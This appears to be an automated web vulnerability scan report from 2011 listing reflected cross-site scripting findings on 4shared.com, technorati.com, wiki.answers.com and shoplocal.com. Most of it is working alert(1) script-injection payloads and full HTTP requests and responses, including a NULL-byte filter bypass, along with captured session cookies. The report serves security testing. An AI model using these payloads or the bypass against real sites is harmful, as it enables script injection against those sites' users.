<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:null--> <title>4shared.co ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://static.4shared.com/js/signup-script.jsp871d8"-alert(1)-"3e7896575aa"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() { var wind ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7306f"-alert(1)-"185336a2aa2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e703"-alert(1)-"88745b017aa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:null--> <title>4shared.co ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://static.4shared.com/press_room/press_room.css9e703"-alert(1)-"88745b017aa"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() { var wind ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f1a9"-alert(1)-"b65b614c6be was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8a6b"-alert(1)-"5873520bbff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:null--> <title>4shared.co ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://static.4shared.com/themes/default.cssd8a6b"-alert(1)-"5873520bbff"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() { var wind ...[SNIP]...
The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a773e"><script>alert(1)</script>dab46f51ed7 was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /cosmos/search.html?url=a773e"><script>alert(1)</script>dab46f51ed7 HTTP/1.1 Host: technorati.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the url request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5eb43'-alert(1)-'f01b11d4625 was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cosmos/search.html?url=5eb43'-alert(1)-'f01b11d4625 HTTP/1.1 Host: technorati.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 45a5f<script>alert(1)</script>72002c4d70c was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /uid.aspx?callback=json_results45a5f<script>alert(1)</script>72002c4d70c HTTP/1.1 Host: uid.shoplocal.com Proxy-Connection: keep-alive Referer: http://www.jcpstoreads.com/jcpenney/Default.aspx?action=entryflash& Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SLHUID=UID=11022007583617319321424330414S&Version=1.65
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 109 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 p3p: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" Set-Cookie: SLHUID=UID=11022007583617319321424330414S&Version=1.65; expires=Fri, 26-Feb-2021 04:53:49 GMT; path=/ X-Powered-By: ASP.NET Date: Sat, 26 Feb 2011 04:53:48 GMT
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 984b4"><script>alert(1)</script>3af2ec5fc61 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Q984b4"><script>alert(1)</script>3af2ec5fc61/FAQ/1873/x26amp HTTP/1.1 Host: wiki.answers.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-language: en Content-Type: text/html; charset=utf-8 Date: Sat, 26 Feb 2011 02:28:06 GMT X-Varnish: 519896922 Age: 0 Via: 1.1 varnish Connection: close Expires: Tue, 16 Jan 2001 00:00:00 GMT Cache-Control: private, must-revalidate, s-maxage=0, max-age=0 Vary: Accept-Encoding Content-Length: 77504
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %001570f"><script>alert(1)</script>7aada9114c7 was submitted in the REST URL parameter 2. This input was echoed as 1570f"><script>alert(1)</script>7aada9114c7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /Q/FAQ%001570f"><script>alert(1)</script>7aada9114c7/1873/x26amp HTTP/1.1 Host: wiki.answers.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache Content-language: en Content-Type: text/html; charset=utf-8 Date: Sat, 26 Feb 2011 02:28:16 GMT X-Varnish: 519898453 Age: 0 Via: 1.1 varnish Connection: close Expires: Tue, 16 Jan 2001 00:00:00 GMT Cache-Control: private, must-revalidate, s-maxage=0, max-age=0 Vary: Accept-Encoding Content-Length: 41577
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com ...[SNIP]... <link rel="canonical" href="http://wiki.answers.com/Q/FAQ%001570f"><script>alert(1)</script>7aada9114c7/1873/x26amp" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4116f"%3balert(1)//fe68ef9022c was submitted in the REST URL parameter 3. This input was echoed as 4116f";alert(1)//fe68ef9022c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Q/FAQ/18734116f"%3balert(1)//fe68ef9022c/x26amp HTTP/1.1 Host: wiki.answers.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-language: en Content-Type: text/html; charset=utf-8 Date: Sat, 26 Feb 2011 02:28:34 GMT X-Varnish: 519900917 Age: 0 Via: 1.1 varnish Connection: close Expires: Tue, 16 Jan 2001 00:00:00 GMT Cache-Control: private, must-revalidate, s-maxage=0, max-age=0 Vary: Accept-Encoding Content-Length: 52028
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76672"><script>alert(1)</script>960fa931a3c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Q/FAQ/187376672"><script>alert(1)</script>960fa931a3c/x26amp HTTP/1.1 Host: wiki.answers.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-language: en Content-Type: text/html; charset=utf-8 Date: Sat, 26 Feb 2011 02:28:33 GMT X-Varnish: 519900860 Age: 0 Via: 1.1 varnish Connection: close Expires: Tue, 16 Jan 2001 00:00:00 GMT Cache-Control: private, must-revalidate, s-maxage=0, max-age=0 Vary: Accept-Encoding Content-Length: 52187
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 653cf"%3balert(1)//03b50bd9b91 was submitted in the REST URL parameter 4. This input was echoed as 653cf";alert(1)//03b50bd9b91 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Q/FAQ/1873/x26amp653cf"%3balert(1)//03b50bd9b91 HTTP/1.1 Host: wiki.answers.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-language: en Content-Type: text/html; charset=utf-8 Date: Sat, 26 Feb 2011 02:28:38 GMT X-Varnish: 519901994 Age: 0 Via: 1.1 varnish Connection: close Expires: Tue, 16 Jan 2001 00:00:00 GMT Cache-Control: private, must-revalidate, s-maxage=0, max-age=0 Vary: Accept-Encoding Content-Length: 161671
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcea3"><script>alert(1)</script>db96d2302f0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Q/FAQ/1873/x26ampfcea3"><script>alert(1)</script>db96d2302f0 HTTP/1.1 Host: wiki.answers.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-language: en Content-Type: text/html; charset=utf-8 Date: Sat, 26 Feb 2011 02:28:37 GMT X-Varnish: 1622868671 Age: 0 Via: 1.1 varnish Connection: close Expires: Tue, 16 Jan 2001 00:00:00 GMT Cache-Control: private, must-revalidate, s-maxage=0, max-age=0 Vary: Accept-Encoding Content-Length: 161813
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
1.301. http://wiki.answers.com/Q/FAQ/1873/x26amp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://wiki.answers.com
Path:
/Q/FAQ/1873/x26amp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17fcb"><script>alert(1)</script>92195d490b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Q/FAQ/1873/x26amp?17fcb"><script>alert(1)</script>92195d490b4=1 HTTP/1.1 Host: wiki.answers.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Set-Cookie: PHPSESSID=hd0boian9748faghsegsfo8ef3; path=/; domain=.answers.com Set-Cookie: hd0boian9748faghsegsfo8ef3=n%3A0%3A%7B%7D; path=/; domain=.answers.com Content-language: en Content-Type: text/html; charset=utf-8 Date: Sat, 26 Feb 2011 02:27:53 GMT X-Varnish: 519894805 Age: 0 Via: 1.1 varnish Connection: close Expires: Tue, 16 Jan 2001 00:00:00 GMT Cache-Control: private, must-revalidate, s-maxage=0, max-age=0 Vary: Accept-Encoding Content-Length: 161527
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9dfa3"><script>alert(1)</script>e28327de2d6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Q9dfa3"><script>alert(1)</script>e28327de2d6/FAQ/2637/x26amp HTTP/1.1 Host: wiki.answers.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-language: en Content-Type: text/html; charset=utf-8 Date: Sat, 26 Feb 2011 02:28:04 GMT X-Varnish: 519896591 Age: 0 Via: 1.1 varnish Connection: close Expires: Tue, 16 Jan 2001 00:00:00 GMT Cache-Control: private, must-revalidate, s-maxage=0, max-age=0 Vary: Accept-Encoding Content-Length: 77437
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0066e4d"><script>alert(1)</script>cdb01e18013 was submitted in the REST URL parameter 2. This input was echoed as 66e4d"><script>alert(1)</script>cdb01e18013 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /Q/FAQ%0066e4d"><script>alert(1)</script>cdb01e18013/2637/x26amp HTTP/1.1 Host: wiki.answers.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache Content-language: en Content-Type: text/html; charset=utf-8 Date: Sat, 26 Feb 2011 02:28:14 GMT X-Varnish: 1622865284 Age: 0 Via: 1.1 varnish Connection: close Expires: Tue, 16 Jan 2001 00:00:00 GMT Cache-Control: private, must-revalidate, s-maxage=0, max-age=0 Vary: Accept-Encoding Content-Length: 41578
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com ...[SNIP]... <link rel="canonical" href="http://wiki.answers.com/Q/FAQ%0066e4d"><script>alert(1)</script>cdb01e18013/2637/x26amp" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2586e"%3balert(1)//1842f1efae8 was submitted in the REST URL parameter 3. This input was echoed as 2586e";alert(1)//1842f1efae8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Q/FAQ/26372586e"%3balert(1)//1842f1efae8/x26amp HTTP/1.1 Host: wiki.answers.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-language: en Content-Type: text/html; charset=utf-8 Date: Sat, 26 Feb 2011 02:28:32 GMT X-Varnish: 519900736 Age: 0 Via: 1.1 varnish Connection: close Expires: Tue, 16 Jan 2001 00:00:00 GMT Cache-Control: private, must-revalidate, s-maxage=0, max-age=0 Vary: Accept-Encoding Content-Length: 52028
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae049"><script>alert(1)</script>ee6b216fa7b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Q/FAQ/2637ae049"><script>alert(1)</script>ee6b216fa7b/x26amp HTTP/1.1 Host: wiki.answers.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-language: en Content-Type: text/html; charset=utf-8 Date: Sat, 26 Feb 2011 02:28:31 GMT X-Varnish: 1622867720 Age: 0 Via: 1.1 varnish Connection: close Expires: Tue, 16 Jan 2001 00:00:00 GMT Cache-Control: private, must-revalidate, s-maxage=0, max-age=0 Vary: Accept-Encoding Content-Length: 151300
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb30d"><script>alert(1)</script>8795961619a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Q/FAQ/2637/x26ampfb30d"><script>alert(1)</script>8795961619a HTTP/1.1 Host: wiki.answers.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-language: en Content-Type: text/html; charset=utf-8 Date: Sat, 26 Feb 2011 02:28:35 GMT X-Varnish: 1622868195 Age: 0 Via: 1.1 varnish Connection: close Expires: Tue, 16 Jan 2001 00:00:00 GMT Cache-Control: private, must-revalidate, s-maxage=0, max-age=0 Vary: Accept-Encoding Content-Length: 151300
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22050"%3balert(1)//7394ecf9e68 was submitted in the REST URL parameter 4. This input was echoed as 22050";alert(1)//7394ecf9e68 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Q/FAQ/2637/x26amp22050"%3balert(1)//7394ecf9e68 HTTP/1.1 Host: wiki.answers.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-language: en Content-Type: text/html; charset=utf-8 Date: Sat, 26 Feb 2011 02:28:36 GMT X-Varnish: 1622868509 Age: 0 Via: 1.1 varnish Connection: close Expires: Tue, 16 Jan 2001 00:00:00 GMT Cache-Control: private, must-revalidate, s-maxage=0, max-age=0 Vary: Accept-Encoding Content-Length: 151159
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
1.308. http://wiki.answers.com/Q/FAQ/2637/x26amp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://wiki.answers.com
Path:
/Q/FAQ/2637/x26amp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f04ca"><script>alert(1)</script>1e97e1450d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Q/FAQ/2637/x26amp?f04ca"><script>alert(1)</script>1e97e1450d6=1 HTTP/1.1 Host: wiki.answers.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Set-Cookie: PHPSESSID=a5sui7s5guog0npukb22o6fja3; path=/; domain=.answers.com Set-Cookie: a5sui7s5guog0npukb22o6fja3=n%3A0%3A%7B%7D; path=/; domain=.answers.com Content-language: en Content-Type: text/html; charset=utf-8 Date: Sat, 26 Feb 2011 02:27:51 GMT X-Varnish: 519894247 Age: 0 Via: 1.1 varnish Connection: close Expires: Tue, 16 Jan 2001 00:00:00 GMT Cache-Control: private, must-revalidate, s-maxage=0, max-age=0 Vary: Accept-Encoding Content-Length: 151015
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload adf8c"-alert(1)-"fa2cfce21c6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /advertiseadf8c"-alert(1)-"fa2cfce21c6/ HTTP/1.1 Host: www.4shared.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:null--> <title>4shared.co ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://www.4shared.com/advertiseadf8c"-alert(1)-"fa2cfce21c6/"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() { var win ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cbe69"-alert(1)-"855c7c91d82 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /advertisecbe69"-alert(1)-"855c7c91d82/banners/desktop/300x250.jsp HTTP/1.1 Host: www.4shared.com Proxy-Connection: keep-alive Referer: http://static.4shared.com/css/indexm.css6ce34'-alert(1)-'2fc82178551?ver=1610 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; search.view2=ls; JSESSIONID=3CFB65BE110C065A39C53A13723EF882.dc278
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:http://static.4shared.com/c ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://www.4shared.com/advertisecbe69"-alert(1)-"855c7c91d82/banners/desktop/300x250.jsp"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bdfe3"-alert(1)-"24e87bceef2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /advertise/bannersbdfe3"-alert(1)-"24e87bceef2/desktop/300x250.jsp HTTP/1.1 Host: www.4shared.com Proxy-Connection: keep-alive Referer: http://static.4shared.com/css/indexm.css6ce34'-alert(1)-'2fc82178551?ver=1610 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; search.view2=ls; JSESSIONID=3CFB65BE110C065A39C53A13723EF882.dc278
